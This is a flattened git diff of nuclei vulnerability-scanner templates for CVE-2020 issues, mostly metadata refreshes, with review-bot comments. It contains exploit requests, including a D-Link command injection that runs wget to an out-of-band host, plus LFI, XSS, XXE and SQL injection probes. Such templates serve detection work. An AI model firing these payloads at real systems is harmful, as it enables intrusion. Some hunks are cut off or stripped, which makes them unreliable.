deleted file mode 100644 index d01da81880..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-23015.yaml +++ /dev/null 
@@ -1,28 +0,0 @@ -id: CVE-2020-23015 - -info: - name: OPNsense 20.1.5. Open Redirect - author: 0x_Akoko - severity: medium - description: An open redirect issue was discovered in OPNsense through 20.1.5. The redirect parameter "url" in login page was not filtered and can redirect user to any website. - reference: - - https://github.com/opnsense/core/issues/4061 - - https://www.cvedetails.com/cve/CVE-2020-23015 - tags: cve,cve2020,redirect,opnsense - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-23015 - cwe-id: CWE-601 - -requests: - - method: GET - - path: - - '{{BaseURL}}/?url=http://example.com' - - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' - part: header diff --git a/nuclei-templates/CVE-2020/CVE-2020-23517.yaml b/nuclei-templates/CVE-2020/CVE-2020-23517.yaml deleted file mode 100644 index 6b74f4c605..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-23517.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2020-23517 -info: - name: Aryanic HighMail (High CMS) XSS - author: geeknik - severity: medium - description: XSS vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm. - reference: https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html - tags: xss,cve,cve2020 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-23517 - cwe-id: CWE-79 -requests: - - method: GET - path: - - "{{BaseURL}}/login/?uid=\">" - matchers-condition: and - matchers: - - type: word - words: - - text/html - part: header - - type: word - words: - - "") && contains(body_4, "Monstra")' condition: and 
@@ -58,10 +64,9 @@ requests: extractors: - type: regex name: csrf - part: body group: 1 regex: - 'id="csrf" name="csrf" value="(.*)">' internal: true - -# Enhanced by md on 2023/02/01 + part: body +# digest: 490a004630440220388c291d21538ae9468cbf1003d57432e845e76f6e5ca57401c295990dbfa3c802201e068fb257170a9fd9eb666b68ebba98a088c87a3f79ab04d71631a4170816d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-23972.yaml b/nuclei-templates/CVE-2020/CVE-2020-23972.yaml index 22960ca182..af1319821d 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-23972.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-23972.yaml @@ -1,4 +1,5 @@ id: CVE-2020-23972 + info: name: Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload author: dwisiswant0 @@ -15,6 +16,7 @@ info: cvss-score: 7.50 cve-id: CVE-2020-23972 cwe-id: CWE-434 + requests: - raw: - | @@ -40,12 +42,14 @@ requests: no_html ------WebKitFormBoundarySHHbUsfCoxlX1bpS-- + payloads: component: - "com_gmapfp" - "comgmapfp" + extractors: - type: regex part: body regex: - - "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);" + - "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);" \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-24589.yaml b/nuclei-templates/CVE-2020/CVE-2020-24589.yaml deleted file mode 100644 index d38bafb820..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-24589.yaml +++ /dev/null 
@@ -1,38 +0,0 @@ -id: CVE-2020-24589 - -info: - name: WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection - author: lethargynavigator - severity: critical - description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls. - reference: - - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0742 - - https://nvd.nist.gov/vuln/detail/CVE-2020-24589 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H - cvss-score: 9.1 - cve-id: CVE-2020-24589 - tags: cve,cve2020,wso2,xxe,oast,blind - -requests: - - raw: - - | - POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - payload=<%3fxml+version%3d"1.0"+%3f>%25xxe%3b]> - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - - type: word - part: body - words: - - "Failed to install the generic artifact type" - -# Enhanced by mp on 2022/04/14 diff --git a/nuclei-templates/CVE-2020/CVE-2020-24701.yaml b/nuclei-templates/CVE-2020/CVE-2020-24701.yaml index 15c5c53bba..f2bc0fc8b8 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-24701.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-24701.yaml 
@@ -11,13 +11,14 @@ info: - https://seclists.org/fulldisclosure/2021/Jul/33 - https://nvd.nist.gov/vuln/detail/CVE-2020-24701 - https://www.open-xchange.com + - https://github.com/20142995/sectool classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-24701 cwe-id: CWE-79 epss-score: 0.00818 - epss-percentile: 0.79881 + epss-percentile: 0.81463 cpe: cpe:2.3:a:open-xchange:open-xchange_appsuite:*:*:*:*:*:*:*:* metadata: verified: true @@ -25,7 +26,7 @@ info: vendor: open-xchange product: open-xchange_appsuite shodan-query: html:"Appsuite" - tags: packetstorm,seclists,cve,cve2020,appsuite,xss + tags: cve,cve2020,packetstorm,seclists,appsuite,xss,open-xchange http: - method: GET @@ -49,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203c22da59a26452418ad75f9b32de2d413d21af29d1c478d94db4887dc521a306022100c9875b8802f9c68e8264fcb91418b261e26a08f37139da09f4b11d83b113f488:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a2cdebb20e18eaa890cfc50613c3066fe88508ab4895439e1e93c3be8538e21e0221009989389686769e0e936f56b8d0c418beb0c14d427c1d13f1eb05dbd4f49ffacc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-24765.yaml b/nuclei-templates/CVE-2020/CVE-2020-24765.yaml index fc1618ae25..03111ee376 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-24765.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-24765.yaml @@ -1,11 +1,12 @@ id: CVE-2020-24765 + info: - name: iMind Server Information Leak + name: iMind Server Information Leak author: medbsq severity: high # https://www.cvebase.com/cve/2020/24765 requests: - - method: GET + - method: GET path: - "{{BaseURL}}/api/rs/monitoring/rs/api/system/dump-diagnostic-info?server=127.0.0.1" headers: 
@@ -14,7 +15,7 @@ requests: matchers: - type: word words: - - "This message is too large to display" + - "This message is too large to display" - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-24902.yaml b/nuclei-templates/CVE-2020/CVE-2020-24902.yaml index 718cae1181..d74e13a076 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-24902.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-24902.yaml 
@@ -6,27 +6,39 @@ info: severity: medium description: | Quixplorer through 2.4.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade to a patched version of Quixplorer (>=2.4.2) or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://dl.packetstormsecurity.net/1804-exploits/quixplorer241beta-xss.txt - https://nvd.nist.gov/vuln/detail/CVE-2020-24902 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-24902 cwe-id: CWE-79 + epss-score: 0.00195 + epss-percentile: 0.56453 + cpe: cpe:2.3:a:quixplorer_project:quixplorer:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"My Download Server" + verified: true + max-request: 1 + vendor: quixplorer_project + product: quixplorer shodan-query: http.title:"My Download Server" - verified: "true" - tags: cve,cve2020,quixplorer,xss + google-query: intitle:"My Download Server" + tags: cve,cve2020,quixplorer,xss,quixplorer_project -requests: +http: - method: GET path: - '{{BaseURL}}/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word 
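Review bot: The added `remediation` for CVE-2020-24902 names a fixed release, `Upgrade to a patched version of Quixplorer (>=2.4.2)`, but the description on the same hunk says the product is affected "through 2.4.1" and none of the listed references establishes that a 2.4.2 release exists. Unless a vendor advisory confirms the fixed version, the line should avoid asserting one, e.g. `remediation: Upgrade to a version newer than 2.4.1 if the vendor provides one, or sanitize the order parameter before reflecting it.` The same pattern of boilerplate remediation text appears in the CVE-2020-24903 and CVE-2020-21012 hunks, which name no version at all; those are at least not making an unverifiable claim.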
@@ -44,5 +56,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/12/08 +# digest: 4a0a00473045022100cc3315a626f72938e1bbd0b8d6123c0a4e45d1f6f608ec22fc41d9b038f25b6d022045f6709f3c37e878675f5ea3caf6f393801ac2d1c850932a039abd8066a934a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-24903.yaml b/nuclei-templates/CVE-2020/CVE-2020-24903.yaml index 3dc77f1ae5..0768866d5e 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-24903.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-24903.yaml 
@@ -6,20 +6,32 @@ info: severity: medium description: | Cute Editor for ASP.NET 6.4 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. + remediation: | + Upgrade to a patched version of Cute Editor for ASP.NET or implement proper input validation to prevent XSS attacks. reference: - https://seclists.org/bugtraq/2016/Mar/104 - https://nvd.nist.gov/vuln/detail/CVE-2020-24903 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-24903 cwe-id: CWE-79 + epss-score: 0.00269 + epss-percentile: 0.67095 + cpe: cpe:2.3:a:cutesoft:cute_editor:6.4:*:*:*:*:asp.net:*:* metadata: + verified: true + max-request: 1 + vendor: cutesoft + product: cute_editor + framework: asp.net shodan-query: http.component:"ASP.NET" - verified: "true" - tags: cve,cve2020,cuteeditor,xss,seclists + tags: cve,cve2020,cuteeditor,xss,seclists,cutesoft,asp.net -requests: +http: - method: GET path: - '{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS";>' @@ -41,5 +53,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/12/08 +# digest: 4b0a004830460221008dc31b494c720948586f64df0d6c82addb71bac56f1d7b99d5b94d7c7d698c20022100fdc628af73a6fc813bb7c98900e81ba79c49b4eeafc5fe53895b55f7c2cfb055:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-25506.yaml b/nuclei-templates/CVE-2020/CVE-2020-25506.yaml index 8bd7bcd242..6ce8094ff6 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-25506.yaml 
+++ b/nuclei-templates/CVE-2020/CVE-2020-25506.yaml @@ -1,19 +1,20 @@ id: CVE-2020-25506 + info: - name: D-Link DNS-320 Unauthenticated Remote Code Execution + name: D-Link DNS-320 - Unauthenticated Remote Code Execution author: gy741 severity: critical - description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution. + description: The exploit targets a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution. reference: - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675 - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-25506 + tags: cve,cve2020,dlink,rce,oast,mirai classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2020-25506 cwe-id: CWE-78 - tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router + requests: - raw: - | @@ -22,14 +23,14 @@ requests: Accept: */* C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` + - | POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1 Host: {{Hostname}} Accept: */* + matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# Enhanced by mp on 2022/03/27 diff --git a/nuclei-templates/CVE-2020/CVE-2020-26217.yaml b/nuclei-templates/CVE-2020/CVE-2020-26217.yaml index 7b4b09fe92..bcad0d4ac7 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-26217.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-26217.yaml 
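Review bot: The new description for CVE-2020-25506 drops the affected-version statement and opens with "The exploit targets a command injection vulnerability in a system_mgr.cgi component", so a reader can no longer tell which firmware is affected; the removed line `D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. ...` should be kept as the description. The same hunk also deletes the `https://nvd.nist.gov/vuln/detail/CVE-2020-25506` reference and the `unauth,router` tags, and rewrites `cvss-score: 9.8` as `9.80`, which is the opposite direction from the normalisation the rest of this commit applies. The CVE-2020-26919 hunk has the identical regression: its description loses "before 2.6.0.43", the NVD link is removed and `router,unauth` are dropped from `tags`, so both look like an older template revision overwriting the current one rather than a deliberate edit.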
@@ -6,21 +6,28 @@ info: severity: high description: | XStream before 1.4.14 is susceptible to remote code execution. An attacker can run arbitrary shell commands by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Users who rely on blocklists are affected. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. + remediation: Fixed in 1.4.14. reference: - https://x-stream.github.io/CVE-2020-26217.html - https://github.com/x-stream/xstream/commit/0fec095d534126931c99fd38e9c6d41f5c685c1a - https://github.com/x-stream/xstream/security/advisories/GHSA-mw36-7c6c-q4q2 - https://nvd.nist.gov/vuln/detail/cve-2020-26217 - remediation: Fixed in 1.4.14. + - https://lists.apache.org/thread.html/r2de526726e7f4db4a7cb91b7355070779f51a84fd985c6529c2f4e9e@%3Cissues.activemq.apache.org%3E classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-26217 cwe-id: CWE-78 - epss-score: 0.97456 - tags: cve,cve2020,xstream,deserialization,rce,oast + epss-score: 0.97384 + epss-percentile: 0.99904 + cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xstream_project + product: xstream + tags: cve,cve2020,xstream,deserialization,rce,oast,xstream_project http: - raw: @@ -94,4 +101,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# Enhanced by md on 2023/04/12 +# digest: 4b0a00483046022100833148b184c9a024daabe14d4fef1a74835dd8f418140ce52d04df763175d9e8022100f65031aa40e1c23f6150f38f0f8737a2ac23a8e5c5f4cc29f48a0de92a01de3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-26248.yaml b/nuclei-templates/CVE-2020/CVE-2020-26248.yaml index 17eec9a35c..98be999570 100644 
--- a/nuclei-templates/CVE-2020/CVE-2020-26248.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-26248.yaml @@ -6,22 +6,32 @@ info: severity: high description: | PrestaShop Product Comments module before version 4.2.1 contains a SQL injection vulnerability, An attacker can use a blind SQL injection to retrieve data or stop the MySQL service, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: Fixed in 4.2.1. reference: - https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html - https://packagist.org/packages/prestashop/productcomments - https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9 - https://nvd.nist.gov/vuln/detail/CVE-2020-26248 - remediation: Fixed in 4.2.1. + - https://github.com/PrestaShop/productcomments/commit/7c2033dd811744e021da8897c80d6c301cd45ffa classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H cvss-score: 8.2 cve-id: CVE-2020-26248 cwe-id: CWE-89 + epss-score: 0.01617 + epss-percentile: 0.87187 + cpe: cpe:2.3:a:prestashop:productcomments:*:*:*:*:*:prestashop:*:* metadata: - verified: "true" - tags: cve,cve2020,sqli,prestshop,packetstorm + verified: true + max-request: 1 + vendor: prestashop + product: productcomments + framework: prestashop + tags: cve,cve2020,packetstorm,sqli,prestshop,prestashop -requests: +http: - raw: - | @timeout: 20s 
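Review bot: The rewritten tags line for CVE-2020-26248 keeps the misspelled `prestshop` tag next to the newly added correct `prestashop` one, so the typo survives the metadata refresh; unless the old tag is kept on purpose for existing filters, the line should read `tags: cve,cve2020,packetstorm,sqli,prestashop`. If it is kept deliberately, a short comment saying so would stop the next cleanup pass from removing it.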
@@ -36,5 +46,4 @@ requests: - 'contains(content_type, "application/json")' - 'contains(body, "average_grade")' condition: and - -# Enhanced by md on 2022/12/08 +# digest: 4b0a00483046022100bfb60507528a715a3186e6f06262c9534c16003bc96c3baa4049108a3d06d67a0221008662896abf6d4938c136f30d2492fc638fb1157aea901a3875741b3251869743:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-26258.yaml b/nuclei-templates/CVE-2020/CVE-2020-26258.yaml index cb31c9a409..ed2f7f7df1 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-26258.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-26258.yaml @@ -6,6 +6,8 @@ info: severity: high description: | XStream before 1.4.15 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to data leakage or further attacks. remediation: Install at least 1.4.15 if you rely on XStream's default blacklist of the Security Framework, and at least Java 15 or higher. reference: - https://x-stream.github.io/CVE-2020-26258.html @@ -18,14 +20,14 @@ info: cvss-score: 7.7 cve-id: CVE-2020-26258 cwe-id: CWE-918 - epss-score: 0.84673 - epss-percentile: 0.98181 + epss-score: 0.90088 + epss-percentile: 0.98718 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project product: xstream - tags: cve,cve2020,xstream,ssrf,oast + tags: cve,cve2020,xstream,ssrf,oast,xstream_project http: - raw: 
@@ -63,4 +65,4 @@ http: part: interactsh_request words: - "User-Agent: Java" -# digest: 4a0a004730450221009c87b98d38a9ff915f6eb98ea533ad3c344880217105f459d6cba6c982645cf7022008545c4f823d634011268c5e370a16af71555efffe94632bf8b209886eb0c09b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210090b286f58ae4ddf71281f47e94a6932952a067406a9d9bd4978cee28462a401b02207bc498dd31d9e55e2a847a6900d2537b77406a0208b97997e752e77bbc887dfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-26919.yaml b/nuclei-templates/CVE-2020/CVE-2020-26919.yaml index f7e7ceacc4..a57eaa9237 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-26919.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-26919.yaml 
@@ -4,16 +4,15 @@ info: name: NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution author: gy741 severity: critical - description: "NETGEAR ProSAFE Plus before 2.6.0.43 is susceptible to unauthenticated remote code execution. Any HTML page is allowed as a valid endpoint to submit POST requests, allowing debug action via the submitId and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow attackers to execute system commands." + description: NETGEAR ProSAFE Plus was found to allow any HTML page as a valid endpoint to submit POST requests, allowing debug action via the submitId and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow attackers to execute system commands. reference: - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-26919 + tags: cve,cve2020,netgear,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2020-26919 - tags: cve,cve2020,netgear,rce,oast,router,unauth requests: - raw: @@ -26,8 +25,6 @@ requests: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# Enhanced by mp on 2022/03/27 diff --git a/nuclei-templates/CVE-2020/CVE-2020-27191.yaml b/nuclei-templates/CVE-2020/CVE-2020-27191.yaml index 90a5bfa054..27d923704b 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-27191.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-27191.yaml 
@@ -1,28 +1,45 @@ id: CVE-2020-27191 + info: - name: LionWiki 3.2.11 - LFI + name: LionWiki <3.2.12 - Local File Inclusion author: 0x_Akoko severity: high - description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted string in the index.php f1 variable, aka Local File Inclusion. + description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted strings in the index.php f1 variable, aka local file inclusion. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data. + remediation: | + Upgrade LionWiki to version 3.2.12 or later to mitigate the LFI vulnerability. reference: - https://www.junebug.site/blog/cve-2020-27191-lionwiki-3-2-11-lfi - http://lionwiki.0o.cz/index.php?page=Main+page - - https://www.cvedetails.com/cve/CVE-2020-27191 + - https://nvd.nist.gov/vuln/detail/CVE-2020-27191 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-27191 cwe-id: CWE-22 - tags: cve,cve2020,lionwiki,lfi,oss -requests: + epss-score: 0.01572 + epss-percentile: 0.86986 + cpe: cpe:2.3:a:lionwiki:lionwiki:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: lionwiki + product: lionwiki + tags: cve2020,cve,lionwiki,lfi,oss + +http: - method: GET path: - "{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1" + matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0:" + - type: status status: - 200 +# digest: 480a00453043022024fd9eabd5990697a1c0d513e268964dba7e4032104e676f2c1516f0d7bf1e6c021f01979b841bd595af2324f5a4beea443729213ab4e816a2f27b4f681dfe71ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2020/CVE-2020-2733.yaml b/nuclei-templates/CVE-2020/CVE-2020-2733.yaml index fbfa6a0b1e..e7a2ec4233 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-2733.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-2733.yaml @@ -6,20 +6,32 @@ info: severity: critical description: | JD Edwards EnterpriseOne Tools 9.2 is susceptible to information disclosure via the Monitoring and Diagnostics component. An attacker with network access via HTTP can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://redrays.io/cve-2020-2733-jd-edwards/ - https://www.oracle.com/security-alerts/cpuapr2020.html - https://nvd.nist.gov/vuln/detail/CVE-2020-2733 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-2733 + epss-score: 0.29301 + epss-percentile: 0.96779 + cpe: cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: oracle + product: jd_edwards_enterpriseone_tools shodan-query: port:8999 product:"Oracle WebLogic Server" - verified: "true" - tags: cve,cve2020,oracle,weblogic,disclosure,exposure + tags: cve2020,cve,oracle,weblogic,disclosure,exposure -requests: +http: - method: GET path: - '{{BaseURL}}/manage/fileDownloader?sec=1' 
@@ -39,5 +51,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/01 +# digest: 4a0a0047304502202fa8f3f605bced9c2bff8bd71dfd1b657c7806b31db0da37ba79f848736c0448022100b028c9c54f50d73729aa0630e94a3a90f88663ee769dae3762ef6b64d4da2dd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-27361.yaml b/nuclei-templates/CVE-2020/CVE-2020-27361.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-27361.yaml rename to nuclei-templates/CVE-2020/CVE-2020-27361.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-27481.yaml b/nuclei-templates/CVE-2020/CVE-2020-27481.yaml index 4547d60b45..83c85522de 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-27481.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-27481.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | An unauthenticated SQL Injection vulnerability in Good Layers LMS Plugin <= 2.1.4 exists due to the usage of "wp_ajax_nopriv" call in WordPress, which allows any unauthenticated user to get access to the function "gdlr_lms_cancel_booking" where POST Parameter "id" was sent straight into SQL query without sanitization. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version of the Good Layers LMS Plugin (2.1.5 or higher) to mitigate this vulnerability. reference: 
@@ -17,15 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2020-27481 cwe-id: CWE-89 - epss-score: 0.10572 - epss-percentile: 0.94453 + epss-score: 0.12857 + epss-percentile: 0.94961 cpe: cpe:2.3:a:goodlayers:good_learning_management_system:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: goodlayers product: good_learning_management_system framework: wordpress - tags: goodlayerslms,sqli,wpscan,cve,cve2020 + tags: cve,cve2020,goodlayerslms,sqli,wpscan,goodlayers,wordpress http: - raw: @@ -44,4 +46,4 @@ http: - "status_code == 200" - "contains(body, 'goodlayers-lms') || contains(body, 'goodlms')" condition: and -# digest: 4a0a00473045022100f9c562bf980df2c173e1dde5a411b8da9a2b8f1ceecd21047c28a6ffa8d7aaf6022036fe5740e488b87335f6f3072726a45157cefa450e380fe3c2f1c979b87ff9e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100838e205274d6592ebebcc4ab9b689fd6d05ec245b61cb0f69cff831152ea32dd02203fc10829d7d36c26e62df66914a28f76aea1fb34c5f7162abe66805dbf74f212:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-28185.yaml b/nuclei-templates/CVE-2020/CVE-2020-28185.yaml index 305c9a9c91..7d8080615c 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-28185.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-28185.yaml 
